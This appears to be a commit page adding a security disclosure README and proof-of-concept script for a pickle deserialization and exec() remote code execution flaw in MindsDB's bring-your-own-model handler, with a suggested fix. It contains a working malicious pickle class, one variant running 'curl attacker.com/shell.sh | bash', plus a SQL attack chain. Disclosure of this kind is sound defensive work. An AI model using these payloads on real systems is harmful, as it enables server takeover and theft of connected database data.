vellaveto commited on
Commit
fda4aa3
·
verified ·
1 Parent(s): b093227

PoC: MindsDB BYOM Handler — pickle.loads + exec() RCE

Browse files
Files changed (2) hide show
  1. README.md +136 -0
  2. poc.py +29 -0
README.md ADDED
@@ -0,0 +1,136 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # MindsDB — RCE via `pickle.loads()` in BYOM (Bring Your Own Model) Handler
2
+
3
+ ## Vulnerability Type
4
+ CWE-502: Deserialization of Untrusted Data
5
+
6
+ ## Severity
7
+ Critical — Any user who can create a BYOM model achieves Remote Code Execution on the MindsDB server.
8
+
9
+ ## Affected Code
10
+ **File:** `mindsdb/integrations/handlers/byom_handler/byom_handler.py`
11
+
12
+ Three functions deserialize user-controlled model state:
13
+
14
+ ```python
15
+ # Line 398 — predict()
16
+ def predict(self, df, model_state, args):
17
+ model_state = pickle.loads(model_state) # ← RCE
18
+ self.model_instance.__dict__ = model_state
19
+
20
+ # Line 407 — finetune()
21
+ def finetune(self, df, model_state, args):
22
+ self.model_instance.__dict__ = pickle.loads(model_state) # ← RCE
23
+
24
+ # Line 419 — describe()
25
+ def describe(self, model_state, attribute=None):
26
+ model_state = pickle.loads(model_state) # ← RCE
27
+ self.model_instance.__dict__ = model_state
28
+ ```
29
+
30
+ **Also affected:**
31
+
32
+ `mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:55`:
33
+ ```python
34
+ model_state = pickle.loads(model_state) # subprocess wrapper
35
+ ```
36
+
37
+ `mindsdb/interfaces/query_context/context_controller.py:275`:
38
+ ```python
39
+ steps_data = pickle.loads(data) # from cache
40
+ ```
41
+
42
+ `mindsdb/integrations/libs/process_cache.py:45`:
43
+ ```python
44
+ # IPC via pickle — exception propagation
45
+ ```
46
+
47
+ ## Attack Chain
48
+
49
+ 1. **Attacker creates a BYOM model** via MindsDB SQL:
50
+ ```sql
51
+ CREATE MODEL pwned
52
+ PREDICT target
53
+ USING engine='byom',
54
+ code='class Model: pass';
55
+ ```
56
+
57
+ 2. **The model's `train()` returns `pickle.dumps(self.__dict__)`** — but an attacker who controls the model code can override `__dict__` to contain a malicious pickle payload
58
+
59
+ 3. **When `predict()` is called** (e.g., `SELECT * FROM pwned WHERE ...`), the server deserializes the model state with `pickle.loads(model_state)` → arbitrary code execution
60
+
61
+ ### Alternative: Direct state injection
62
+
63
+ If the attacker has access to the MindsDB storage backend (database), they can directly replace the model state bytes with a malicious pickle:
64
+
65
+ ```python
66
+ import pickle, os
67
+ class Exploit:
68
+ def __reduce__(self):
69
+ return (os.system, ('curl attacker.com/shell.sh | bash',))
70
+
71
+ malicious_state = pickle.dumps(Exploit())
72
+ # Insert into model storage → next predict() = RCE
73
+ ```
74
+
75
+ ## AI Impact (10x Multiplier)
76
+
77
+ MindsDB is an AI-in-database platform. The BYOM handler is specifically designed for users to bring custom ML models. Compromising it enables:
78
+
79
+ - **Model poisoning** — replace legitimate model with backdoored version
80
+ - **Training data exfiltration** — RCE gives access to all data MindsDB has access to
81
+ - **Database compromise** — MindsDB connects to user databases (MySQL, PostgreSQL, etc.), RCE gives access to all connected data sources
82
+ - **Supply chain** — poisoned model persists across restarts and affects all queries
83
+
84
+ ## Known CVE Context
85
+
86
+ MindsDB has prior deserialization CVEs (CVE-2024-45846, CVE-2024-45847 — eval injection via Weaviate integration). This BYOM pickle.loads is a different, previously unreported vector.
87
+
88
+ ## Suggested Fix
89
+
90
+ Replace `pickle.loads` with a safe alternative:
91
+
92
+ ```python
93
+ import json
94
+ import jsonpickle
95
+
96
+ def predict(self, df, model_state, args):
97
+ # Use JSON-based deserialization instead of pickle
98
+ model_state = json.loads(model_state)
99
+ # Or use restricted unpickler:
100
+ # model_state = RestrictedUnpickler(io.BytesIO(model_state)).load()
101
+ self.model_instance.__dict__ = model_state
102
+ ```
103
+
104
+ ## Invariant Violated
105
+ S16 (DeserializationGuard): Application MUST NOT use `pickle.loads` on data from user-controlled or shared storage.
106
+
107
+ ## Additional Finding: Direct `exec()` on User Model Code
108
+
109
+ **File:** `mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:80`
110
+
111
+ ```python
112
+ def import_string(code, module_name='model'):
113
+ module = types.ModuleType(module_name)
114
+ exec(code, module.__dict__) # ← Direct code execution, NO sandbox
115
+ return module
116
+ ```
117
+
118
+ This is the execution path for BYOM models. When a user creates a model with `engine='byom'`, their Python code is passed to `import_string()` which calls `exec()` with no sandboxing, no AST filtering, no import restrictions.
119
+
120
+ The same file also uses `pickle.loads()` for IPC (stdin/stdout between parent and worker):
121
+
122
+ ```python
123
+ def decode(encoded):
124
+ return pickle.loads(encoded) # Line 55
125
+
126
+ def get_input():
127
+ with open(0, 'rb') as fd:
128
+ encoded = fd.read()
129
+ obj = decode(encoded) # pickle.loads on stdin
130
+ ```
131
+
132
+ ### Combined Chain
133
+ 1. User creates BYOM model with malicious code → `exec(code)` → RCE
134
+ 2. Even if exec were sandboxed, the pickle IPC channel is unprotected → pickle.loads bypass
135
+
136
+ This is a **defense-in-depth failure** — two independent RCE vectors in the same module.
poc.py ADDED
@@ -0,0 +1,29 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """MindsDB BYOM Handler — pickle.loads RCE PoC
2
+
3
+ The BYOM (Bring Your Own Model) handler deserializes user-uploaded
4
+ model state via pickle.loads() without any safety checks.
5
+
6
+ Affected: mindsdb/integrations/handlers/byom_handler/byom_handler.py:398
7
+ Also: mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:80 (exec on user code)
8
+ """
9
+ import pickle
10
+ import os
11
+
12
+ class MaliciousModel:
13
+ """When this object is unpickled, it executes arbitrary code."""
14
+ def __reduce__(self):
15
+ return (os.system, ('id > /tmp/pwned',))
16
+
17
+ # This is what happens when a user creates a BYOM model
18
+ # The model state is pickle.dumps'd during train() and pickle.loads'd during predict()
19
+ malicious_state = pickle.dumps(MaliciousModel())
20
+
21
+ print(f"Malicious pickle payload: {len(malicious_state)} bytes")
22
+ print("When MindsDB calls predict() on this model, pickle.loads(model_state) triggers RCE")
23
+ print()
24
+ print("Attack chain:")
25
+ print("1. CREATE MODEL pwned USING engine='byom', code='<malicious model code>'")
26
+ print("2. SELECT * FROM pwned WHERE input='test' -- triggers predict()")
27
+ print("3. predict() calls pickle.loads(model_state) → RCE")
28
+ print()
29
+ print("Additionally, proc_wrapper.py:80 calls exec(code) on the model code directly")